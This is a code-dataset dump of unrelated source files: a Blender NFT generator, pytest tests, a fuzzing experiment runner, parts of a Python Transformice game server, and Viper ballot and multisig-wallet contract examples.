import json
import os
import bpy
import bmesh
import time
import sys
all_images = []
#amount = 1*6*6*6*1 = 216 combinations
data = {
"layers": [
{
"name": "Body",
"values": ["Yellow"]
},
{
"name": "Hat",
"values": ["Alchemist","Arcmage","Darkmage","Druid","Mage","Witch"]
},
{
"name": "Robe",
"values": ["Alchemist", "Arcmage","Darkmage", "Druid","Mage", "Witch"]
},
{
"name": "Staff",
"values": ["Alchemist", "Arcmage","Darkmage", "Druid","Mage", "Witch"]
},
{
"name": "Background",
"values": ["Black"]
}
]
}
def metadataa(fle,i,body,glass,bag,cap, wp):
x = open("C:\\Users\\pc\\Desktop\\test1\\json\\"+fle,'a+')
metadata ={
"name": "",
"description": "",
"image": "",
"edition": "",
"attributes": [
{
"trait_type": "Background",
"value": ""
},
{
"trait_type": "Body",
"value": ""
},
{
"trait_type": "Hat",
"value": ""
},
{
"trait_type": "Robe",
"value": ""
},
{
"trait_type": "Staff",
"value": ""
}
]}
metadata['name']="Axolot"
metadata['description']="It's just it"
metadata['image']="ipfs://random/"
metadata['edition']=i
for i in metadata['attributes']:
if (i["trait_type"]=="Background"):
i["value"] = wp
if (i["trait_type"]=="Body"):
i["value"] = body
if (i["trait_type"]=="Hat"):
i["value"] = glass
if (i["trait_type"]=="Robe"):
i["value"] = bag
if (i["trait_type"]=="Staff"):
i["value"] = cap
json_format = json.dumps(metadata, indent=2)
x.write(json_format)
def progress(count, total, status=''):
bar_len = 60
filled_len = int(round(bar_len * count / float(total)))
percents = round(100.0 * count / float(total), 1)
bar = '=' * filled_len + '-' * (bar_len - filled_len)
sys.stdout.write('[%s] %s%s ...%s\r' % (bar, percents, '%', status))
sys.stdout.flush()
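# Example (illustrative): progress(15, 60) writes a 60-character bar (15 '=' then 45 '-')
# followed by ' 25.0% ...'; the trailing '\r' lets the next call overwrite the same line.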
def collections(collection, col_list):
col_list.append(collection.name)
for sub_collection in collection.children:
collections(sub_collection, col_list)
def clear():
collection = bpy.data.collections["Collection"]
meshes = set()
for obj in [o for o in collection.objects if o.type == 'MESH']:
bpy.data.objects.remove(obj)
meshes = set()
for obj in [o for o in collection.objects if o.type == 'LIGHT']:
bpy.data.objects.remove(obj)
def clear_bg():
collection = bpy.data.collections["Collection"]
meshes = set()
for obj in [o for o in collection.objects if o.type == 'MESH']:
if obj.name in "Plane":
bpy.data.objects.remove(obj)
def createDna(data):
new_image = {}
for layer in data["layers"]:
if (layer["name"]=="Background"):
new_image[layer["name"]] = random.choices(layer["values"])[0]
if (layer["name"]=="Body"):
new_image[layer["name"]] = random.choices(layer["values"])[0]
if (layer["name"]=="Hat"):
new_image[layer["name"]] = random.choices(layer["values"],weights=(10,10,10,10,10,50))[0]
if (layer["name"]=="Robe"):
new_image[layer["name"]] = random.choices(layer["values"], weights=(10,10,10,10,10,50))[0]
if (layer["name"]=="Staff"):
new_image[layer["name"]] = random.choices(layer["values"], weights=(10,10,10,10,10,50))[0]
if new_image in all_images:
print("GEN> DNA EXITS")
return createDna(data)
else:
print("GEN> NEW DNA: {}".format(new_image))
return new_image
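# Example return value (illustrative), drawn from the 'data' layers above:
# {'Body': 'Yellow', 'Hat': 'Witch', 'Robe': 'Mage', 'Staff': 'Druid', 'Background': 'Black'}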
def createObj(ammount,data):
for x in range(ammount):
new_dna = createDna(data)
all_images.append(new_dna)
for y in range(ammount):
clear()
rez_list = []
progress(y, ammount, status='')
z = y + 1
result_fbx = str(z)+".fbx"
result_png = str(z)+".png"
body_fbx=all_images[y]["Body"] +".blend"
glass_fbx=all_images[y]["Hat"] +".blend"
bag_fbx=all_images[y]["Robe"] +".blend"
cap_fbx=all_images[y]["Staff"] +".blend"
wp_fbx=all_images[y]["Background"] +".fbx"
result_json = str(z)+".json"
metadataa(result_json,z,all_images[y]["Body"],all_images[y]["Hat"], all_images[y]["Robe"],all_images[y]["Staff"],all_images[y]["Background"])
bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Body\\{body_fbx}\\Collection\\")
bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Hat\\{glass_fbx}\\Collection\\")
bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Robe\\{bag_fbx}\\Collection\\")
bpy.ops.wm.append(filename="Collection 1", directory=f"C:\\Users\\pc\\Desktop\\obj\\Staff\\{cap_fbx}\\Collection\\")
bpy.ops.import_scene.fbx(filepath="C:\\Users\\pc\\Desktop\\obj\\Background\\"+wp_fbx)
bpy.context.scene.render.filepath = "C:\\Users\\pc\\Desktop\\test1\\png\\"+ result_png
bpy.ops.render.render(use_viewport = True, write_still=True)
clear_bg()
collections(bpy.context.collection, rez_list)
for x in rez_list:
if x =="Collection":
print("passed")
else:
collection = bpy.data.collections[x]
bpy.data.collections.remove(collection)
clear()
if __name__ =="__main__":
#createObj(count,data)
createObj(1,data)
``` |
{
"source": "01210210/police-brutality",
"score": 3
} |
#### File: tools/tests/test_data_builder.py
```python
import pytest
from data_builder import title_to_name_date
tests = [
(
'Title here | May 30th',
('Title here', '2020-05-30', 'May 30th')
),
(
'Title here',
('Title here', '', '')
),
]
@pytest.mark.parametrize("input,expected", tests)
def test_title_to_name_date(input, expected):
assert title_to_name_date(input) == expected
def test_handle_missing_name(capsys):
title_missing_name = '| May 30th'
title_to_name_date(title_missing_name)
captured = capsys.readouterr()
assert "Failed name parse: missing name for" in str(captured)
@pytest.mark.skip(reason="failing test, need to handle this case")
def test_handle_name_with_multiple_pipes():
malformed_title = 'Thing happened | this day | May 30th'
result = title_to_name_date(malformed_title)
# what should happen here?
def test_handle_missing_date(capsys):
title_missing_date = 'Title thinger'
title_to_name_date(title_missing_date)
captured = capsys.readouterr()
assert "Failed date parse: missing date for" in str(captured)
def test_handle_weird_date_format(capsys):
title_with_bad_date = 'Title | Leb 21'
result = title_to_name_date(title_with_bad_date)
captured = capsys.readouterr()
assert "Failed date format parse for title" in str(captured)
@pytest.mark.skip(reason="failing test, need to handle this case")
def test_handle_nonexistant_date():
title_with_bad_date = 'Title | February 31st'
result = title_to_name_date(title_with_bad_date)
# what should happen here?
```
#### File: tools/tests/test_process_md_texts.py
```python
import pytest
from data_builder import process_md_texts
def test_handle_dc():
data = {'Washington DC': "### Title | June 1st\n\nDescription of things \n\n**Links**\n\n* https://twitter.com/"}
result = process_md_texts(data)
assert result[0]['city'] == 'DC'
def test_handle_missing_location():
data = {'Unknown Location': "### Title | June 1st\n\nDescription of things \n\n**Links**\n\n* https://twitter.com/"}
result = process_md_texts(data)
assert result[0]['city'] == ''
def test_handle_missing_links(capsys):
data = {'Washington DC': "### Title | June 1st\n\nDescription of things \n\n**Links**\n\n\n\n### Another Title | May 31\n\nDescription.\n\n**Links**\n\n"}
process_md_texts(data)
captured = capsys.readouterr()
assert "Failed links parse: missing links for" in str(captured)
def test_more_than_200_records_found():
pass
``` |
{
"source": "0152la/SpecAST",
"score": 2
} |
#### File: SpecAST/scripts/run_experiments.py
```python
import argparse
import datetime
import git
import logging
import math
import os
import random
import shlex
import shutil
import signal
import subprocess
import statistics
import sys
import time
import yaml
import pdb
###############################################################################
# Argument parsing
###############################################################################
parser = argparse.ArgumentParser(
description = "Metalib batch experiment generator and runner",
formatter_class = argparse.RawTextHelpFormatter)
parser.add_argument("config", type=str,
help = "Path to configuration yaml file.")
# MODE SETTINGS
parser.add_argument("--mode", choices=["count", "time", "generate"], default="count",
help = """Select the mode of the tool.
count - generate and execute a number of tests [DEFAULT]
time - generate and execute for a set amount of time
generate - generate single test case""")
parser.add_argument("--mode-val", type=int, default=100,
help = """Mode-dependent value selector. Set `-1` for infinity.
`count` mode - sets number of tests to generate
`time` mode - sets time to execute in seconds.""")
# PARAMETERS
parser.add_argument("--seed", type=int, default=random.randint(0, sys.maxsize),
help = "Seed to initialize random generator in script.")
parser.add_argument("--gen-timeout", type=int, default=30,
help = "Maximum time, in seconds, to allow generation for a test case.")
parser.add_argument("--run-timeout", type=int, default=120,
help = "Maximum time, in seconds, to allow execution of generated test cases.")
parser.add_argument("--stop-on-fail", action='store_true',
help = "If set, testing stops on first execution failure.")
parser.add_argument("--append-id", action='store_true',
help = "If set, appends a random numeric hash to the output folder")
# DEBUG OPTIONS
parser.add_argument("--debug", action='store_true',
help = "If set, emit runtime debug information")
parser.add_argument("--debug-to-file", action='store_true',
help = "If set, emits debug output to log file.")
parser.add_argument("--runtime-log", type=str, default="runtime.log",
help = "Name of log for runtime information.")
parser.add_argument("--stats-log", type=str, default="stats.log",
help = "Name of log file to store statistics about test executions.")
parser.add_argument("--log-all-tests", action='store_true',
help = "If set, saves all generated test files, instead of only the failing"
" ones.")
parser.add_argument("--always-log-out", action='store_true',
help = "If set, always prints the output of STDOUT and STDERR for test"\
" generation phases.")
# OTHER OPTIONS
parser.add_argument("--no-symlink", action='store_true',
help = "If set, will not symlink the testing folder for ease access to the "
"latest experimental run. Useful for running things in parallel.")
parser.add_argument("--print-cmd-out", action='store_true',
help = "If set, prints to console the STDOUT and STDERR for test"\
" generation phases.")
TIMEOUT_STR = "TIMEOUT"
###############################################################################
# Helper functions
###############################################################################
def exec_cmd(name, cmd, test_id, timeout=None, log_test=False):
if not timeout:
log_console.debug(f"Running {name} command:\n\t*** {cmd}")
else:
log_console.debug(f"Running {name} command with t/o {timeout}:\n\t*** {cmd}")
start_time = time.perf_counter()
cmd_proc = subprocess.Popen(shlex.split(cmd), stdout=subprocess.PIPE,
stderr=subprocess.PIPE, encoding="utf-8")
try:
out, err = cmd_proc.communicate(timeout=timeout)
exec_time = time.perf_counter() - start_time
proc_timeout = False
except subprocess.TimeoutExpired:
proc_timeout = True
cmd_proc.kill()
out, err = cmd_proc.communicate()
exec_time = TIMEOUT_STR
log_runtime.info(f"{name} return code: {cmd_proc.returncode}")
log_runtime.info(f"{name} duration: {exec_time}")
if cmd_proc.returncode != 0 or args.always_log_out:
if proc_timeout:
log_runtime.info(f"TIMEOUT {name} command")
else:
log_runtime.info(f"FAIL {name} command")
log_runtime.debug(f"STDOUT:\n{out}")
log_runtime.debug(f"STDERR:\n{err}")
if args.print_cmd_out:
log_console.info(f"STDOUT:\n{out}")
log_console.info(f"STDERR:\n{err}")
test_save_name = ""
if proc_timeout:
log_console.warning(f"Timeout {name} command for test count {test_id}!")
if log_test:
test_save_name = f"{test_id:07d}_{name}_timeout"
elif cmd_proc.returncode != 0:
log_console.warning(f"Failed {name} command for test count {test_id}!")
test_save_name = f"{test_id:07d}_{name}_fail"
elif log_test:
test_save_name = f"{test_id:07d}_{name}"
if test_save_name:
try:
shutil.copyfile(full_output_file_name, f"{save_test_folder}/{test_save_name}")
except FileNotFoundError:
pass
stats = {}
stats["exec_time"] = exec_time
stats["return_code"] = cmd_proc.returncode
return stats
def terminate_handler(sig, frame):
log_console.info(f"Received terminate signal, finishing...")
global terminate
terminate = True
def emit_times_stats(times, t_type, writer):
try:
writer.write(f"Average {t_type} times: ")
writer.write(str(statistics.mean([x for x in times if isinstance(x, float)])))
writer.write("\n")
writer.write(f"Median {t_type} times: ")
writer.write(str(statistics.median([x for x in times if isinstance(x, float)])))
writer.write("\n")
except statistics.StatisticsError:
writer.write(f"Average {t_type} times: all t/o\n")
writer.write(f"Median {t_type} times: all t/o\n")
def make_abs_path(pth, log, check_exists = False):
if not os.path.isabs(pth):
log.debug(f"Expanding found relative path `{pth}`.")
a_pth = os.path.abspath(pth)
try:
assert (not check_exists or os.path.exists(pth))
except AssertionError:
print(f"Inexistent absolute path `{a_pth}` expanded from relative path `{pth}`.")
return a_pth
log.debug(f"Returning found absolute path `{pth}`.")
return pth
def log_git_repo_data(pth, describer, writer):
try:
pth_repo = git.Repo(pth)
writer.write(f"{describer} version: {pth_repo.head.commit.hexsha}\n")
except (KeyError):
writer.write(f"{describer} version: KeyError\n")
except (git.exc.NoSuchPathError):
writer.write(f"{describer} version: NoSuchPathError\n")
except (git.exc.InvalidGitRepositoryError):
writer.write(f"{describer} version: InvalidGitRepoError\n")
###############################################################################
# Main function
###############################################################################
if __name__ == '__main__':
args = parser.parse_args()
signal.signal(signal.SIGTERM, terminate_handler)
if args.debug:
log_level = logging.DEBUG
else:
log_level = logging.INFO
log_console = logging.getLogger('console')
log_console_handler = logging.StreamHandler(sys.stdout)
log_console.addHandler(log_console_handler)
log_console.setLevel(log_level)
log_console.debug("Debug mode set")
log_console.debug(f"Setting mode {args.mode} with value {args.mode_val}")
log_console.debug(f"Setting seed {args.seed}")
random.seed(args.seed)
log_console.debug(f"Parsing YAML config file {args.config}")
with open(args.config, 'r') as config_fd:
config = yaml.load(config_fd, Loader=yaml.FullLoader)
config['working_dir'] = make_abs_path(config['working_dir'], log_console, True)
log_console.debug(f"Setting cwd to {config['working_dir']}")
os.chdir(config["working_dir"])
config['output_folder'] = make_abs_path(config['output_folder'], log_console)
symlink_name = f"{config['output_folder']}_last"
if args.append_id:
config['output_folder'] += f"_{random.getrandbits(20):07d}"
full_output_file_name = f"{config['output_folder']}/{config['output_file_name']}"
if os.path.exists(config['output_folder']):
log_console.debug(f"Removing existing output folder {config['output_folder']}.")
shutil.rmtree(config['output_folder'])
log_console.debug(f"Creating output folder {config['output_folder']}.")
os.makedirs(config['output_folder'], exist_ok=True)
if not args.no_symlink:
if os.path.exists(symlink_name):
os.remove(symlink_name)
os.symlink(config['output_folder'], symlink_name)
save_test_folder_name = "tests"
save_test_folder = f"{config['output_folder']}/{save_test_folder_name}"
os.makedirs(save_test_folder, exist_ok=False)
log_runtime_filename = args.runtime_log
log_console.debug(f"Setting runtime log file `{log_runtime_filename}`")
log_runtime = logging.getLogger('gentime')
log_runtime.setLevel(log_level)
log_runtime_handler = logging.FileHandler(f"{config['output_folder']}/{log_runtime_filename}", 'w', "utf-8")
log_runtime.addHandler(log_runtime_handler)
if args.debug_to_file:
log_console.addHandler(log_runtime_handler)
# Concatenate all parameters and values together and prefix the parameter
# flag name with '--'
param_string = " ".join(["--" + x + " " + str(config['params'][x]) for x in config['params']])
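    # e.g. a config with params: {"max-depth": 5, "seed-gen": 42} (hypothetical names)
    # yields the CLI fragment "--max-depth 5 --seed-gen 42".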
stats = {}
stats["total_tests"] = 0
stats["gen_fail"] = 0
stats["compile_fail"] = 0
stats["timeout_tests"] = 0
stats["fail_tests"] = 0
stats["test_gentimes"] = []
stats["test_compiletimes"] = []
stats["test_runtimes"] = []
stats["run_return_codes"] = {}
test_count = 0
terminate = False
experiment_start_time = time.perf_counter()
while not terminate:
if args.mode_val != -1:
if args.mode == "count" and args.mode_val <= test_count:
log_console.debug(f"Hit max number of given tests; stopping...")
break
elif args.mode == "time" and args.mode_val <= time.perf_counter() - experiment_start_time:
log_console.debug(f"Executed max number of given seconds; stopping...")
break
elif args.mode == "generate" and test_count != 0:
log_console.debug(f"Generated one test case; stopping...")
sys.exit(0)
test_count += 1
stats["total_tests"] += 1
if not args.debug:
log_console_handler.terminator = '\r'
curr_time = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
curr_time = "\033[1m\033[31m" + curr_time + "\033[0m"
log_console.debug(f"[{curr_time}] Test count {test_count} - Elapsed time {time.perf_counter() - experiment_start_time} - Mode {args.mode} - Mode Value {args.mode_val}")
gen_seed = args.seed if args.mode == "generate" else random.randrange(sys.maxsize)
log_console.debug(f"Generating test with seed {gen_seed}")
log_runtime.info(f"===== Test count {test_count} with seed {gen_seed}")
config['template_file'] = make_abs_path(config['template_file'], log_console, True)
gen_cmd = f"./build/mtFuzzer {config['template_file']}"\
f" -o {full_output_file_name}"\
f" --seed {gen_seed}"\
f" {param_string}"
gen_result = exec_cmd("generate", gen_cmd, test_count, timeout=args.gen_timeout)
stats["test_gentimes"].append(gen_result["exec_time"])
if gen_result["return_code"] != 0:
stats["gen_fail"] += 1
continue
if args.mode == "generate":
log_console.debug(f"Generated one test case; stopping...")
sys.exit(0)
config['cmake_script_dir'] = make_abs_path(config['cmake_script_dir'], log_console, True)
compile_cmd = f"{os.path.abspath(config['compile_script'])} {full_output_file_name} {config['cmake_script_dir']}"
old_cwd = os.getcwd()
os.chdir(config['output_folder'])
compile_result = exec_cmd("compile", compile_cmd, test_count)
stats["test_compiletimes"].append(compile_result["exec_time"])
if compile_result["return_code"] != 0:
stats["compile_fail"] += 1
os.chdir(old_cwd)
continue
os.chdir(old_cwd)
run_output_file_name = os.path.splitext(f"{full_output_file_name}")[0]
run_cmd = f"{run_output_file_name}"
run_result = exec_cmd("execute", run_cmd, test_count, timeout=args.run_timeout, log_test=args.log_all_tests)
stats["test_runtimes"].append(run_result["exec_time"])
if not run_result['return_code'] in stats['run_return_codes']:
stats['run_return_codes'][run_result['return_code']] = 0
stats['run_return_codes'][run_result['return_code']] += 1
if run_result["return_code"] != 0:
if run_result["exec_time"] == TIMEOUT_STR:
stats["timeout_tests"] += 1
else:
stats["fail_tests"] += 1
if args.stop_on_fail and run_result["exec_time"] != TIMEOUT_STR:
log_console.info("Found execution failure and `stop_on_fail` set; exitting...");
break
continue
experiment_time = time.perf_counter() - experiment_start_time
log_console_handler.terminator = '\n'
log_console.info(f"Finished experiments {config['output_folder']}.")
with open(f"{config['output_folder']}/{args.stats_log}", 'w') as stats_writer:
log_git_repo_data(config['working_dir'], "Generator", stats_writer)
log_git_repo_data(config['spec_repo_dir'], "Specification", stats_writer)
log_git_repo_data(config['lib_repo_dir'], "Library under test", stats_writer)
stats_writer.write(80 * '-' + '\n');
stats_writer.write(f"Seed: {args.seed}\n")
stats_writer.write(f"Gen timeout: {args.gen_timeout}\n")
stats_writer.write(f"Run timeout: {args.run_timeout}\n")
stats_writer.write(f"Parameters: {param_string}\n")
stats_writer.write(80 * '-' + '\n');
stats_writer.write(f"Total experiment time: {datetime.timedelta(seconds=math.trunc(experiment_time))}\n")
stats_writer.write(f"Total test count: {stats['total_tests']}\n")
stats_writer.write(f"Total generation fails: {stats['gen_fail']}\n")
stats_writer.write(f"Total compilation fails: {stats['compile_fail']}\n")
stats_writer.write(f"Total execution fails: {stats['fail_tests']}\n")
stats_writer.write(f"Total execution timeouts: {stats['timeout_tests']}\n")
stats_writer.write(80 * '-' + '\n');
emit_times_stats(stats['test_gentimes'], "generation", stats_writer)
emit_times_stats(stats['test_compiletimes'], "compile", stats_writer)
emit_times_stats(stats['test_runtimes'], "execution", stats_writer)
stats_writer.write(80 * '=' + '\n');
stats_writer.write(f"\nRaw data:\n")
stats_writer.write(yaml.dump(stats))
``` |
{
"source": "0190342791072401740917904E9012740997199/TransformiceServer",
"score": 2
} |
#### File: messages/incoming/IMDummy.py
```python
from ruby.communication.messages.Incoming import Incoming
class IMDummy(Incoming):
tokens = [26, 26]
def dispatch(self, session, buffer_array):
pass
```
#### File: messages/incoming/IMLogin.py
```python
from ruby.communication.messages.Incoming import Incoming
class IMLogin(Incoming):
tokens = [26, 8]
def dispatch(self, session, buffer_array):
pass
```
#### File: ruby/geoip/GeoIP.py
```python
from geoip2 import database
from ruby.utils import Logging
from ruby.utils.Language import Language
class GeoIP:
def __init__(self):
Logging.info("Loading geoip.")
self.__reader = database.Reader('files/GeoLite2-Country.mmdb')
self.__languages = {
Language.PT: {
"PT"
},
Language.BR: {
"BR"
},
Language.EN: {
"US",
"AG",
"CA",
"AU",
"BS",
"BB",
"BZ"
},
Language.ES: {
"AR",
"PY",
"UY",
"CO",
"PE",
"CL",
"EC",
"BO",
"VE",
"SV",
"NI",
"GT",
"CR",
"CU",
"GQ",
"HN",
"PA",
"DO",
"MX",
"ES"
}
}
def get(self, address):
try:
response = self.__reader.country(address)
iso_code = response.country.iso_code
for language in self.__languages:
if iso_code in self.__languages[language]:
return language
except:
pass
return Language.EN
```
#### File: network/buffer/BufferArray.py
```python
import struct
class BufferArray:
def __init__(self, data=b""):
if type(data) == bytes:
self.bytes = data
elif type(data) == str:
self.bytes = data.encode()
else:
self.bytes = b""
def write(self, data):
global bytes
self.bytes += bytes(data, 'utf-8')
def writeBool(self, data):
self.bytes += struct.pack('!?', bool(data))
def writeByte(self, data):
self.bytes += struct.pack('!B', int(data))
def writeBytes(self, data):
self.bytes += data
def writeShort(self, data):
self.bytes += struct.pack('!H', int(data))
def writeInt(self, data):
self.bytes += struct.pack('!I', int(data))
def writeLong(self, data):
self.bytes += struct.pack('!Q', int(data))
def writeUTF(self, data):
data = data.encode()
length = len(data)
self.bytes += struct.pack('!H', length)
self.bytes += data
def readBool(self):
data = struct.unpack('!?', self.bytes[:1])[0]
self.bytes = self.bytes[1:]
return data
def readByte(self):
data = struct.unpack('!B', self.bytes[:1])[0]
self.bytes = self.bytes[1:]
return data
def readBytes(self, length):
data = self.bytes[:length]
self.bytes = self.bytes[length:]
return data
def readShort(self):
data = struct.unpack('!H', self.bytes[:2])[0]
self.bytes = self.bytes[2:]
return data
def readInt(self):
data = struct.unpack('!I', self.bytes[:4])[0]
self.bytes = self.bytes[4:]
return data
def readLong(self):
data = struct.unpack('!Q', self.bytes[:8])[0]
self.bytes = self.bytes[8:]
return data
def readUTF(self):
length = struct.unpack('!H', self.bytes[:2])[0]
data = self.bytes[2:(length + 2)]
self.bytes = self.bytes[(2 + length):]
return data.decode()
def toByteArray(self):
return self.bytes
def __len__(self):
return len(self.bytes)
def bytesAvailable(self):
return len(self.bytes) > 0
```
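A small round-trip sketch for the buffer above; it assumes the class is importable under the `ruby.network.buffer` package path used elsewhere in this codebase (see Session.py). Values written are read back in FIFO order.
```python
from ruby.network.buffer.BufferArray import BufferArray  # path as used in Session.py

buf = BufferArray()
buf.writeShort(26)        # packed as '!H' (2 bytes, big-endian)
buf.writeUTF("Bonjour")   # 2-byte length prefix followed by the UTF-8 payload
buf.writeBool(True)       # packed as '!?' (1 byte)

assert buf.readShort() == 26
assert buf.readUTF() == "Bonjour"
assert buf.readBool() is True
assert not buf.bytesAvailable()   # everything has been consumed
```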
#### File: ruby/network/Network.py
```python
import asyncore
import socket
from ruby.network.sessions.Session import Session
class Network(asyncore.dispatcher):
def __init__(self, host, port, backlog):
asyncore.dispatcher.__init__(self)
self.create_socket(socket.AF_INET, socket.SOCK_STREAM)
self.set_reuse_addr()
self.bind((host, port))
self.listen(backlog)
def handle_accepted(self, socket, address):
Session(socket, address)
```
#### File: network/sessions/Session.py
```python
import asyncore
import random
from ruby import Controller
from ruby.network.buffer.BufferArray import BufferArray
from ruby.network.buffer.Encoder import Encoder
from ruby.utils import Logging
from ruby.utils.Language import Language
class Session(asyncore.dispatcher_with_send):
def __init__(self, socket, address):
super().__init__(socket)
Controller.session_manager.append(self)
self.__socket = socket
self.__disposed = False
self.__client = None
self.__encoder = Encoder()
self.ipAddress = address[0]
self.language = Language(0)
self.lastPacketID = 0
self.authKey = random.randrange(0xFFFF)
def handle_read(self):
if self.__disposed:
return
self.out_buffer = self.recv(1024)
if not self.out_buffer:
self.disconnect()
return
if self.out_buffer[0] == 60 and self.__client is None:
self.send(
"<cross-domain-policy><allow-access-from domain=\"*\" to-ports=\"*\" /></cross-domain-policy>")
self.disconnect()
return
length = len(self.out_buffer)
if length < 5:
return
buffer = BufferArray(self.out_buffer)
sizeByte = buffer.readByte()
if sizeByte < 1 or sizeByte > 3:
return
packetLen = buffer.readByte() if sizeByte == 1 else buffer.readShort() if sizeByte == 2 else ((
buffer.readByte() & 0xFF) << 16) | (
(
buffer.readByte() & 0xFF) << 8) | (
buffer.readByte() & 0xFF) if sizeByte == 3 else 0
fullPacketLen = packetLen + sizeByte + 2
if packetLen == 0 or length < fullPacketLen:
return
packetId = buffer.readByte()
if packetId != self.lastPacketID:
self.disconnect()
return
self.lastPacketID = (packetId + 1) % 100
code1 = buffer.readByte()
code2 = buffer.readByte()
opcodes = code2 + (code1 << 8)
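        # e.g. the token bytes [26, 8] (cf. IMLogin.tokens) give opcode 8 + (26 << 8) = 6664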
if Controller.packet_manager.__contains__(opcodes):
Controller.packet_manager.get(opcodes).dispatch(self, buffer)
else:
Logging.alert(f"Packet not found: [{code1}, {code2}] with opcode: {opcodes}")
def writable(self):
if not self.__disposed:
return True
def send(self, data):
self.socket.send(self.__encoder.encoder(data))
def disconnect(self):
if not self.__disposed:
Controller.session_manager.remove(self)
self.__disposed = True
self.close()
```
#### File: TransformiceServer/ruby/Server.py
```python
import asyncore
from ruby.network.Network import Network
from ruby.utils import Logging
class Server:
def __init__(self, host, ports, backlog):
self.__host = host
self.__ports = ports
self.__backlog = backlog
self.__validPorts = []
def start(self):
Logging.info("Starting server.")
for port in self.__ports:
try:
Network(self.__host, port, self.__backlog)
self.__validPorts.append(port)
except Exception as e:
Logging.alert(f"Can't bind on port: {port}")
Logging.info(f"Server working on ports: {self.__validPorts}")
asyncore.loop(timeout=30.0, use_poll=False, map=None, count=None)
```
#### File: ruby/tests/Tests.py
```python
from ruby.network.buffer.Encoder import Encoder
class Tests:
@staticmethod
def send(data):
encoder = Encoder()
message = encoder.encoder(data)
print(message)
pass
```
#### File: ruby/utils/Logging.py
```python
import datetime
def info(output):
print(str(datetime.datetime.now().strftime("%X")) + f" [INFO] {output}")
return
def warn(output):
print(str(datetime.datetime.now().strftime("%X")) + f" [WARN] {output}")
return
def alert(output):
print(str(datetime.datetime.now().strftime("%X")) + f" [ALERT] {output}")
return
def session(address, output):
print(str(datetime.datetime.now().strftime("%X")) + f" [SESSION] [{address}] {output}")
return
def packet(action, output):
print(str(datetime.datetime.now().strftime("%X")) + f" [PACKET] [{action}] {output}")
return
``` |
{
"source": "01admin/viper",
"score": 4
} |
#### File: examples/voting/ballot.v.py
```python
voters: public({
# weight is accumulated by delegation
weight: num,
# if true, that person already voted
voted: bool,
# person delegated to
delegate: address,
# index of the voted proposal
vote: num
}[address])
# This is a type for a list of proposals.
proposals: public({
# short name (up to 32 bytes)
name: bytes32,
# number of accumulated votes
vote_count: num
}[num])
voter_count: public(num)
chairperson: public(address)
# Setup global variables
def __init__(_proposalNames: bytes32[5]):
self.chairperson = msg.sender
self.voter_count = 0
for i in range(5):
self.proposals[i] = {
name: _proposalNames[i],
vote_count: 0
}
# Give `voter` the right to vote on this ballot.
# May only be called by `chairperson`.
def give_right_to_vote(voter: address):
    # Throws if sender is not the chairperson
assert msg.sender == self.chairperson
# Throws if voter has already voted
assert not self.voters[voter].voted
    # Throws if the voter's voting weight isn't 0
assert self.voters[voter].weight == 0
self.voters[voter].weight = 1
self.voter_count += 1
# Delegate your vote to the voter `to`.
def delegate(_to: address):
to = _to
# Throws if sender has already voted
assert not self.voters[msg.sender].voted
# Throws if sender tries to delegate their vote to themselves
assert not msg.sender == to
# loop can delegate votes up to the current voter count
for i in range(self.voter_count, self.voter_count+1):
if self.voters[to].delegate:
            # Because there are no while loops, use recursion to forward the delegation
# self.delegate(self.voters[to].delegate)
assert self.voters[to].delegate != msg.sender
to = self.voters[to].delegate
self.voters[msg.sender].voted = True
self.voters[msg.sender].delegate = to
if self.voters[to].voted:
# If the delegate already voted,
# directly add to the number of votes
self.proposals[self.voters[to].vote].vote_count += self.voters[msg.sender].weight
else:
# If the delegate did not vote yet,
# add to her weight.
self.voters[to].weight += self.voters[msg.sender].weight
# Give your vote (including votes delegated to you)
# to proposal `proposals[proposal].name`.
def vote(proposal: num):
assert not self.voters[msg.sender].voted
self.voters[msg.sender].voted = True
self.voters[msg.sender].vote = proposal
# If `proposal` is out of the range of the array,
# this will throw automatically and revert all
# changes.
self.proposals[proposal].vote_count += self.voters[msg.sender].weight
# Computes the winning proposal taking all
# previous votes into account.
@constant
def winning_proposal() -> num:
winning_vote_count = 0
for i in range(5):
if self.proposals[i].vote_count > winning_vote_count:
winning_vote_count = self.proposals[i].vote_count
winning_proposal = i
return winning_proposal
# Calls winning_proposal() function to get the index
# of the winner contained in the proposals array and then
# returns the name of the winner
@constant
def winner_name() -> bytes32:
return self.proposals[self.winning_proposal()].name
```
#### File: examples/wallet/wallet_test.py
```python
from ethereum.tools import tester as t
from ethereum import utils
c = t.Chain()
c.head_state.gas_limit = 10**9
x = c.contract(open('wallet.v.py').read(), args=[[t.a1, t.a2, t.a3, t.a4, t.a5], 3], language='viper')
print(c.last_tx.data[-192:])
c.tx(sender=t.k1, to=x.address, value=10**17)
print([utils.encode_hex(a) for a in [t.a1, t.a2, t.a3, t.a4, t.a5]])
def sign(seq, to, value, data, key):
h1 = utils.sha3(utils.encode_int32(seq) + b'\x00' * 12 + to + utils.encode_int32(value) + data)
h2 = utils.sha3(b"\x19Ethereum Signed Message:\n32" + h1)
return list(utils.ecsign(h2, key))
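# Note: h1 mirrors the hash computed on-chain in wallet.v.py
# (sha3 over seq, the 12-byte-padded address, value and data), and h2 adds the standard
# "\x19Ethereum Signed Message:\n32" prefix so that ecrecover in the contract matches the signature.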
to, value, data = b'\x35' * 20, 10**16, b""
assert x.approve(0, to, value, data, [sign(0, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k3, 0, t.k5)])
try:
x.approve(1, to, value, data, [sign(1, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, 0, 0, t.k5)])
success = True
except:
success = False
assert not success
try:
x.approve(1, to, value, data, [sign(1, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k7, 0, t.k5)])
success = True
except:
success = False
assert not success
try:
assert x.approve(0, to, value, data, [sign(0, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k3, 0, t.k5)])
success = True
except:
success = False
assert not success
assert x.approve(1, to, value, data, [sign(1, to, value, data, k) if k else [0, 0, 0] for k in (t.k1, 0, t.k3, 0, t.k5)])
print("Basic tests passed")
zero_address = "0x0000000000000000000000000000000000000000"
accounts = ["0x776ba14735ff84789320718cf0aa43e91f7a8ce1", "0x095ce4e4240fa66ff90282c26847456e3f3b5002"]
